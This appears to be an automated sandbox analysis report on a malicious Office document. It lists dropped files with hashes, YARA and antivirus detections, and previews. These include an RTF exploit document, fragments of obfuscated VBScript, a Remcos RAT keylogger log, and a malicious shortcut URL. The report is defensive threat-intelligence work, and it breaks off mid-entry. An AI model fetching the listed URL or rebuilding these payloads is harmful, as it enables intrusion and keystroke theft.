                  SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                  MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                  SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                  SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                  SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                  Malicious:false
                  Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\creatednewwaterbottleforme[1].gif

                  Download File
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):419812
                  Entropy (8bit):3.5814445916859183
                  Encrypted:false
                  SSDEEP:3072:FHGhwf2YFbhNe4VTdRnTT8w4TW7HqOOgVpp20KeLS7lixg36t+v4pNdS7ES:0wf2YFZHqf
                  MD5:94734CB139B6B9025FD8A1ACC56027DB
                  SHA1:B385368BCAADACA073849A413660B68E690FFBA5
                  SHA-256:7DDE4D5F845DBB2A078F6D0A290472D22CC845C6D6927CC0ADA645CE050C7B08
                  SHA-512:58E0064F4B304B5503C4A7E689D96CC62BAC4BC8EE76D39FEDE408B9E777B9602334DAD4E1570FA0B9E0C363E7D8EE419A41D4DA02493D174D61F96ACCA4053F
                  Malicious:false
                  Preview:..d.i.m. .p.l.a.t.i.n.a.m.i.n.a. .....p.l.a.t.i.n.a.m.i.n.a. .=. .m.e.l.e.a.n.t.e.....a.c.o.v.a.r.(.".m.a.r.a.n.h.a.r.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".d.r.u.p.a.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".i.n.d.i.g.e.n.a.t.o.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".m.u.l.h.e.r.i.n.h.a.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".X._.H.e.l.p.U.r.i.s._.0.0.5._.0._.M.e.s.s.a.g.e.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".a.n.t.r.o.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".m.a.s.c.a.r.a.d.a.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".X._.H.e.l.p.U.r.i.s._.0.0.8._.0._.M.e.s.s.a.g.e.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".X._.H.e.l.p.U.r.i.s._.0.0.9._.0._.M.e.s.s.a.g.e.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".X._.H.e.l.p.U.r.i.s._.0.1.0._.0._.M.e.s.s.a.g.e.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".L._.H.e.l.p.

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1D0FB8B4.emf

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                  Category:dropped
                  Size (bytes):6088012
                  Entropy (8bit):2.787418529034627
                  Encrypted:false
                  SSDEEP:24576:sq+Ox34wayWx1+wGZjvat3wwKuWh1Owox:sq+Ox34wAx1+w0jvat3wwkh1Owg
                  MD5:21EDB7AE03A1C77AC0ED8B094677E4F5
                  SHA1:96448892CF82AC6556DD0AE2B5DB45EDC743FBC5
                  SHA-256:E52B52825EE8BAF57C9430F29A8D1BAFC58FF95DFC93E540DF7FE33E279940D2
                  SHA-512:1577CEFE8CE2B0AF658BA128763EFAECCC5390658AB46F7AA20B2FF73BB03752A253192EF8FD83942FA6FC7866E7CCEFC0D2041CB75BC86D180EF4D578AEED81
                  Malicious:false
                  Preview:....l...........m...............!?..3X.. EMF....L.\.S...#...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'................3f.....%....................3f.....................................L...d...4...f...7...{...4...f...........!..............?...........?................................'.......................%...........(.......................L...d...............................$...!..............?...........?................................'...

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\693B04E2.emf

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                  Category:dropped
                  Size (bytes):5935072
                  Entropy (8bit):2.6745845951535956
                  Encrypted:false
                  SSDEEP:12288:71cNPI5R32GnjPjIwcusrwvsWXKcnXfxpMZacUkRaN7Hjo1PWwiD8dt3iGnjPjIt:7uNOR30wOSKx1Owiat3wwKuWh1OwuSH
                  MD5:50A7A55055F552E07590ED711C6EA98A
                  SHA1:F5163067A74A1C5F50413C85C52BD43F9426F698
                  SHA-256:493C5B42C889CEC9B2B5659703DB40CB6F06FD5D4F0FD2FE72BE8C3AD0A426DC
                  SHA-512:6B40B324896AB88E41E39AFF6CF78162EEF7CCF0D08636330642564898670F682404811DB20AA762AD9DAB59EBCF43164AA2AF5F0DCAF62A4DA5CB94027A0CD0
                  Malicious:false
                  Preview:....l...........^...r...........QN...a.. EMF......Z.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6A024A7A.emf

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                  Category:dropped
                  Size (bytes):43432
                  Entropy (8bit):3.129229435071891
                  Encrypted:false
                  SSDEEP:384:/Usp7tZAxiFIsu5DKqaby3rZU+5D6fFC/9Vf6p:csppOVsuxdwgNUxW9NE
                  MD5:61C395110F84CFE31063007BEF8C5F2F
                  SHA1:DD43D9FFB48B091404EEAA8F00BC01E0AB0CB721
                  SHA-256:41D4E618784A475EBDB6C5C683CE780B869B6086F07B9980B1109881DCBEA8A4
                  SHA-512:4A80E35396934E953F34233DAAA200135303161FBCF40C87B000F60D7F85B50671F9ECC1D55D6A36CF0C7A7031B8D2D3A5E31423D4EBCF39EDA03BF733679A9A
                  Malicious:false
                  Preview:....l...........:...............~@..xW.. EMF................................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................<.......%...........%.......................R...p................................@..T.i.m.e.s. .N.e.w. .R.o.m.a.n.......................................................................).6L.......................................... .............................G................*..Ax...N..............T.i.m.e.s. .N.e.w. .R.o...F.....6...............`...................................................dv......%...........%...........%.......................T...T...........+...q........i.@...@....Z.......L...............<.......P... .t.,...............T...T...,.......W...q........i.@...@,...Z.......L...............<.......P... .^.,.......................................T...T.......s...+............i.@...@........

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91B46433.emf

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                  Category:dropped
                  Size (bytes):6089288
                  Entropy (8bit):2.7861367732295585
                  Encrypted:false
                  SSDEEP:24576:XneC03wwKSKI1Tw7bHTat3wwKuWh1OwQ2:XneC03wwEI1TwHHTat3wwkh1Owr
                  MD5:312328140CF0503344FFC52CEAE47A36
                  SHA1:399423AAAD0CAB762FDE31D8F341BDE69DC4421F
                  SHA-256:1DC4BD2733ED7EC8ECDD67FC1577801FA308D951A5D77C2178AF357051EB1F54
                  SHA-512:898706A1321289A2C71C3E8F6B1593F8893A91565B1224BE070304FEFA28BE755E1D5FEB59D12925786D8D86E0EC33C0DAF39B5D19911706F1F91FEA3BECEF35
                  Malicious:false
                  Preview:....l...........{................D...`.. EMF....H.\.]...#.......................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................#..."...........!...................................................#..."...........!...................................................#..."...........!...................................................#...'................3f.....%....................3f.....................................L...d.......R.......c.......R...........!..............?...........?................................'.......................%...........(.......................L...d...................................!..............?...........?................................'...

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D09A9DB5.doc

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:Rich Text Format data, version 1
                  Category:dropped
                  Size (bytes):85983
                  Entropy (8bit):2.656661142867628
                  Encrypted:false
                  SSDEEP:384:AMNF0TJENLHnQiT6Bg1VCWsVdTLoTYq4UxggoYYxA7qYpxylSPA:fc1EpHQDgCJwvCvYYxAxylSPA
                  MD5:E03F3290788DE4D7A103F16B780B3CCE
                  SHA1:C220E79A2714ED59F4D7B1D0A4F6C63A03772EA6
                  SHA-256:DB4FED8FB3C35582ADE2FA57A5866EC7795E94BFF34F004F66D15233D1A2FCD8
                  SHA-512:9372B124ECB895A5C7672D75D17EB3EA3D91FAB5ED675AA82090D8D00C15CB4477553342A356C4F8616869C2987105E6468BB2A912196DAB055E06E34AD24B63
                  Malicious:true
                  Yara Hits:
                  • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D09A9DB5.doc, Author: ditekSHen
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  Preview:{\rtf1........{\*\aoutl173498089 \"}.{\443609054`?:`'1=]2=]656[~8|#_@.0.%)5-|8,9,`!`5>@.>^><<`6^.~?~<;_?5.6(2.??888%4/&/>8;^'4!-8.$7^-6'*%038?9:|)/90~>1?!/]?:|54&?(!)^%.^&?2~3|3(|@7$]*^?9:&!+?[.8$,~]$&!92~#76_$+~_8./8^0???!8?@6%@-%'(8^%(;~8?,?41,9(6@%3.[:6#?$&4^?];@~*$?'+?03~?(;[>@`?%-4-?0*8;.?.8$]^.!/2.?9.^^2~];..?5?.6%.?5-/^|%.|%@/.:03,=9%?.@.!=>$2~%8$?.$?55%?>.;.@:3!7:?)?~@?41/<@/&?(2#?*<1,?`]*,1*^1!;6%7+]8..?895?10,%(?|-5`%.4?4+^-03$0]#*%~-5)'!02.@?(4%?.95#.^|?3%[947=2?$_.&`2.??[?)().;<.;??'_!3=?.):5=*.].=_[(-32%.'++|9?5?^_.>!1+!`;5?.<)27??~?1;9)_*0=(%=$89-%$]6![.%=&`0($..!++.%<%_68.|>7/.*|%]1&6<*-.?<9(420^(??@[.3.(%5'_?$5-$>%5<36:=#>)2&/51@$17?,0+(%>8+>%16!4|!(.`34|86.;&?%1.&|^7*?*;[+&;.:[12*%)]4./;6%*=./_!5?+;?@.~$~.[?%@=@.?.>+|>$&~#?383.'$^?<'5].7)~06^~.|.[0?&[:%?^^;,3?%`,:^0>-<6?=&|??]?`-&|/[`780&0|!..%$8!%)4&?_:|'.]#;[[.37&_1].:*)9:*$*%&=+?5`?5]($??#(:?!!3?)?;-6.<|-_.,&??+>-;'|:<?|)24,[,%(8.<?_@>:8?##-;?-6???)>.?4=]%?+/%54&??9?1]>5^&:2]4?'(9#.>6?6`9.;$#2+~..$[]`5$+1?9?(.<&[&87

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2F215D8E-00CF-4E4E-9C6A-7B89408264B1}.tmp

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):15360
                  Entropy (8bit):5.680669291847939
                  Encrypted:false
                  SSDEEP:384:txPXxtqTDaPlxnqTDBP4xnqTDBPS4nqTDqPSxnGD:DbbRPRp2cR
                  MD5:84A13B86DF4B0BC5C3521A57CA0364C3
                  SHA1:91FE112E829D0BC1580BA13EECD882921AAFAC91
                  SHA-256:3A5E0FA9684F2EFB38D36A8CAD73D3A3B9885CEFAFFF0D5D11F590C60BCC3891
                  SHA-512:C7822A4FE2D26ED6D5B258F22F20BBBC20697B84420823C3CE8E3F256D3F570691401794E6ED48D9226F9E1D470445C9395B67074B2DE75D35E97A7C0A9E76D7
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{034FF383-ED64-42E0-B6D0-5EEBB3D935C9}.tmp

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):11776
                  Entropy (8bit):3.5211173719664557
                  Encrypted:false
                  SSDEEP:192:dTnJeularzhuqHMd9wMa831d3A6IaJC9ywaYAFC5LfeRVINpGSqkNIre71fR832t:diYqB83Q6XDYAFC5L2RVThkNIru583EZ
                  MD5:5F859B6DEA718E31DB2828D1E8395AFF
                  SHA1:A769A150736AA066D944BAF621A0004FA908C772
                  SHA-256:AFF1929488B6FB4A7B0317B259806443477025AE132E6711AAC5EC3480B07919
                  SHA-512:B4CE7E956F1CA683B78C299DAE597178DF6422EEA74259B5CA44A2936DF7C961B7468FC5BE5B426DF6839447350121EBB7E3A1D25BC84FE6DB61FDAE85BFAC13
                  Malicious:false
                  Preview:......4.3.6.0.9.0.5.4.`.?.:.`.'.1.=.].2.=.].6.5.6.[.~.8.|.#._.@...0...%.).5.-.|.8.,.9.,.`.!.`.5.>.@...>.^.>.<.<.`.6.^...~.?.~.<.;._.?.5...6.(.2...?.?.8.8.8.%.4./.&./.>.8.;.^.'.4.!.-.8...$.7.^.-.6.'.*.%.0.3.8.?.9.:.|.)./.9.0.~.>.1.?.!./.].?.:.|.5.4.&.?.(.!.).^.%...^.&.?.2.~.3.|.3.(.|.@.7.$.].*.^.?.9.:.&.!.+.?.[...8.$.,.~.].$.&.!.9.2.~.#.7.6._.$.+.~._.8.../.8.^.0.?.?.?.!.8.?.@.6.%.@.-.%.'.(.8.^.%.(.;.~.8.?.,.?.4.1.,.9.(.6.@.%.3...[.:.6.#.?.$.&.4.^.?.].;.@.~.*.$.?.'.+.?.0.3.~.?.(.;.[.>.@.`.?.%.-.4.-.?.0.*.8.;...?...8.$.].^...!./.2...?.9...^.^.2.~.].;.....?.5.?...6.%...?.5.-./.^.|.%...|.%.@./...:.0.3.,.=.9.%.?...@...!.=.>.$.2.~.%.8.$.?...$.?.5.5.%.?.>...;...@.:.3.!.7.:.?.).?.~.@.?.4.1./.<.@./.&.?.(.2.#.?.*.<.1.,.?.`.].*.,.1.*.^.1.!.;.6.%.7.+.].8.....?.8.9.5.?.1.0.,.%.(.?.|.-.5.`.%...4.?.4.+.^.-.0.3.$.0.].#.*.%.~.-.5.).'.!.0.2...@.?.(.4.%.?...9.5.#...^.|.?.3.%.[.9.4.7.=.2.?.$._...&.`.2...?.?.[.?.).(.)...;.<...;.?.?.'._.!.3.=.?...).:.5.=.*...]...=._.[.(.-.3.2.%...'.+.+.|.9.?.5.?.^._...>.!.1.

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{940A3EA1-C726-4A15-A0E5-47290CF79D3F}.tmp

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):1024
                  Entropy (8bit):0.05390218305374581
                  Encrypted:false
                  SSDEEP:3:ol3lYdn:4Wn
                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\eyxcmf0f.2tf.ps1

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1

                  C:\Users\user\AppData\Local\Temp\ktearnw1.g5w.psm1

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1

                  C:\Users\user\AppData\Local\Temp\note\nots.dat

                  Download File
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):360
                  Entropy (8bit):3.5392076145810467
                  Encrypted:false
                  SSDEEP:6:6lVhlc65YcIeeDAl+XYwSySNombQDyFwfxNa/WAv:6lVwKeczwhykn50/W+
                  MD5:9FDCBE0BD419A77A95498ECCD1F9601A
                  SHA1:8F9B544C4EBAD2D4D873B7497704D97743868D63
                  SHA-256:27979894D5E1B8C0D1B78A9EF0ABE55750B52F66335E863FFAFAB91F8F2118BC
                  SHA-512:4E22BF8B655A6A4BA0A8EF15B31FFB4D2931936E49E44FB8A2889E69F37C1F8715E224D66E44423F1AF8963CD111396B2136E519DDC829EB485C05EC5CD7346A
                  Malicious:true
                  Yara Hits:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\note\nots.dat, Author: Joe Security
                  Preview:....[.2.0.2.4./.0.7./.2.6. .0.7.:.0.8.:.5.9. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.s.A. .[.R.e.a.d.-.O.n.l.y.]. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.M.i.c.r.o.s.o.f.t. .E.x.c.e.l.].........[.N.e.w. .T.a.b. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                  C:\Users\user\AppData\Local\Temp\{AE86EE30-228F-4A13-B460-3CD7E0B95EF5}

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):131072
                  Entropy (8bit):0.025596317382011586
                  Encrypted:false
                  SSDEEP:6:I3DPczqNo4avxggLR8zaEWpRXv//4tfnRujlw//+GtluJ/eRuj:I3DPHNktxvYg3J/
                  MD5:4A4581ABB108836C69D536D27E786247
                  SHA1:C867E0260C3DACE84362BAAF6BF34AEA0504E291
                  SHA-256:DB6F7275509A9D8130677A27CD9C5D0B5EDE8A3204A325FBB376E6AEDEB6C90A
                  SHA-512:D6B5CBBC6B6189BBE593B23963F1BAC0B0F5073D7FE8F15A31591C705CCBD89901CDE89692DD6C9DA0516C0D20F712134F812291AFF365A8CD6636BAEE6AF095
                  Malicious:false
                  Preview:......M.eFy...zt..R.h.E......S,...X.F...Fa.q...............................P.F.L..jES.................C..K..........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\{E5664471-CFDD-40CE-B80A-5F4272B38DEA}

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):131072
                  Entropy (8bit):0.025496666854144305
                  Encrypted:false
                  SSDEEP:6:I3DPcUy5HvxggLRXx1AY3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPVy5P7TNvYg3J/
                  MD5:0413B0AC98609472FEA5235CD05F49E4
                  SHA1:A99B6BBFDCAA2E242907D852846C2064D40168FA
                  SHA-256:E5B52C21B11EA076BF2A296954E5DD56AF44935178AC4230B429CCFBC8EC4CA4
                  SHA-512:A57CA0BE61475CD7A108AD8E6E479BF88808204321CE36F454C0655DD5961726BC97C0DF736641BBC6650D39B201B223B065F27BB99181A1B0E52E392596ECF5
                  Malicious:false
                  Preview:......M.eFy...z./.0>..B.x.$..C.S,...X.F...Fa.q............................@.py...O../..3*.........T P..A.B..5.:........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DF1128541BFE0476BD.TMP

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                  Malicious:false
                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DF86012724870D7705.TMP

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):647168
                  Entropy (8bit):7.897723043776095
                  Encrypted:false
                  SSDEEP:12288:wF6xYtzOlYQlgr9+IUZF+x3kiuFBgANkAPQ7s1Q+A+cttStNW2JS2RLkH5:s6sKGQKr9+FZF+S0ANklw1Q1Ftt5R
                  MD5:8061EFD37F408B73FB8C34DE9D745BDD
                  SHA1:FF3A98EB6E3EA4F9A53681B066D44FB67D9B467B
                  SHA-256:A6005B3EC4FB7E0FBE3470765603968DF608CB9DD6BC29A43E97A7988D836696
                  SHA-512:A33DF292BA5215E658C92126B5AE7CAA6C0AA0E1AEA32C4F7BB65190884140FE6D88EE647FE6B7B27F6188D7148EFE1D6FD0635DE75AF45B317D6F171E1C0E55
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DFC865B56879478CEE.TMP

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                  Malicious:false
                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DFE4D87C1F83611F19.TMP

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):647680
                  Entropy (8bit):7.919420373983589
                  Encrypted:false
                  SSDEEP:12288:RF6xYtzOlYQlgr9+IUZF+x3kiuFBgANkAPQ7s1Q+A+cttStNW2JS2RLkH5:D6sKGQKr9+FZF+S0ANklw1Q1Ftt5R
                  MD5:41B29466E337251CE8F6BEDB6C4EBCB2
                  SHA1:75B2748DE426AF12C513EFEA200C11F5CAADE7F1
                  SHA-256:E6C9517532AC17D9B6A98B14C2B7E65E8868A9FAE3BFB83C03B46D5A369F5FBA
                  SHA-512:58F877BF7B65D682D24185B77E13CF0B0D8BF84CFBC9990A8A9AB76259BB73FEF7080B046297DC1CB8E91EF762396582A994AB7793E42B7936A9E7F64120B5FC
                  Malicious:false
                  Preview:......................>...................(........................................................................................................................................................... ...!..."...#...$...%...&...'...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:Generic INItialization configuration [xls]
                  Category:modified
                  Size (bytes):91
                  Entropy (8bit):4.7451174094964115
                  Encrypted:false
                  SSDEEP:3:bDycLOQXhb3dfpzCmMdFB3dfpzCv:bDDxjoJI
                  MD5:22DA60252D369C130962EA5A269366D6
                  SHA1:CF1A7DF2A02091420DA96BE2CEF0B19E0566DF6C
                  SHA-256:073C2157C06257A760538787E3F8829B4AC9E9B408FB95A81B54DDB660FB56E7
                  SHA-512:0DACFEEE7694FDDCB6CA1C47B27C31FD1D4295DE5C4001D054F9B3FBE1D7CF1BC892CB7DB9A32C73977383A2487ACF8051DAB2F872519DC3CEF7AE2789FED10F
                  Malicious:false
                  Preview:[folders]..sA.url=0..tny.wtf.url=0..AWD 490104998518.LNK=0..[xls]..AWD 490104998518.LNK=0..

                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\sA.url

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:MS Windows 95 Internet shortcut text (URL=<http://tny.wtf/sA>), ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):43
                  Entropy (8bit):4.414409522043331
                  Encrypted:false
                  SSDEEP:3:HRAbABGQYm/3LcmWjy:HRYFVm/3LOjy
                  MD5:DCF2C6BA6D31D8757A4131A6A7C3DDB8
                  SHA1:F49B7795E9EE7139609EAA674FF9606DE5A50544
                  SHA-256:801EEA495BE27F4F9509F7478C7B38316438F48CC57F7763ECB7BA2B4E8B295A
                  SHA-512:F8F5809A6EE32189A1F0AA5DDB46F220B400C6A35FF7BEBE9D059EBC3ABAAAB0183034BE4237D4E9343153D38D7F4AE899498CC905723798CFB711F24596862B
                  Malicious:true
                  Preview:[InternetShortcut]..URL=http://tny.wtf/sA..

                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\tny.wtf.url

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
